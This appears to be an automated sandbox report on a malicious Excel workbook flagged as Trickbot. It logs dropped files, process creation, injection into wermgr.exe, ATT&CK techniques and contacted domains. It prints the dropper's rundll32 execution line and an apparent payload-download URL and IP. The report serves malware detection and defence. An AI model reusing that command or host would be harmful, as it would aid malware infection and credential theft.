              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{11B75B4D-A321-4A86-ACC8-8963D3D53D65} - OProcSessId.datJump to behavior
              Source: 446446.xlsOLE indicator, Workbook stream: true
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartWJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_040727CB push dword ptr [edx+14h]; ret 1_2_0407282D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_04072720 push dword ptr [edx+14h]; ret 1_2_0407282D
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.2.rundll32.exe.4030000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.rundll32.exe.3fb0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.rundll32.exe.4030000.3.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.2.rundll32.exe.4030000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.rundll32.exe.3fb0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.rundll32.exe.4030000.3.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting21Path InterceptionProcess Injection11Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.rundll32.exe.4030000.3.unpack100%AviraHEUR/AGEN.1138157Download File

              Domains

              SourceDetectionScannerLabelLink
              living-traditions.com0%VirustotalBrowse
              clientconfig.passport.net0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
              https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%VirustotalBrowse
              https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              http://living-traditions.com/blogs/click.php0%Avira URL Cloudsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
              https://directory.services.0%URL Reputationsafe
              https://directory.services.0%URL Reputationsafe
              https://directory.services.0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              living-traditions.com
              		64.207.186.30
              		truefalseunknown
              clientconfig.passport.net
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://living-traditions.com/blogs/click.phpfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                		high
                https://login.microsoftonline.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                  		high
                  https://shell.suite.office.com:14437313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                    		high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                      		high
                      https://autodiscover-s.outlook.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                          		high
                          https://cdn.entity.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://api.addins.omex.office.net/appinfo/query7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                            		high
                            https://clients.config.office.net/user/v1.0/tenantassociationkey7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                              		high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                		high
                                https://powerlift.acompli.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://lookup.onenote.com/lookup/geolocation/v17313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                  		high
                                  https://cortana.ai7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                    		high
                                    https://cloudfiles.onenote.com/upload.aspx7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                      		high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                        		high
                                        https://entitlement.diagnosticssdf.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                          		high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                            		high
                                            https://api.aadrm.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                              		high
                                              https://api.microsoftstream.com/api/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                		high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                  		high
                                                  https://cr.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                    		high
                                                    https://portal.office.com/account/?ref=ClientMeControl7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                      		high
                                                      https://ecs.office.com/config/v2/Office7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                        		high
                                                        https://graph.ppe.windows.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                              		high
                                                              https://store.office.cn/addinstemplate7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                		high
                                                                https://globaldisco.crm.dynamics.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    		high
                                                                    https://store.officeppe.com/addinstemplate7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dev0-api.acompli.net/autodetect7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.odwebp.svc.ms7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groups7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                        		high
                                                                        https://graph.windows.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          		high
                                                                          https://dataservice.o365filtering.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://officesetup.getmicrosoftkey.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://analysis.windows.net/powerbi/api7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                            		high
                                                                            https://prod-global-autodetect.acompli.net/autodetect7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                              		high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                		high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                  		high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                    		high
                                                                                    https://ncus.contentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
